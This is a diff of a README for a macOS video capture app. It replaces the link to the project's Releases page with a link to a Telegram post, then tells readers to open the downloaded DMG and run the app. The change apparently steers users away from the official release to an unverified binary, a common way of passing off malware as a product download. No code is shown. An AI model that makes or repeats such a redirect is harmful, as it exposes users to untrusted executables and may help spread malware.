Ahmad0Dev/MacVideoCapture/README.md

 - Video capture device compatible with macOS

 ### Installation
-1. Download the latest version from the [Releases page](../../releases)
+1. Download the latest version from here : https://t.me/A7maad_dev/16456
 2. Open the DMG file and drag the app to Applications folder
 3. Open the app from Applications folder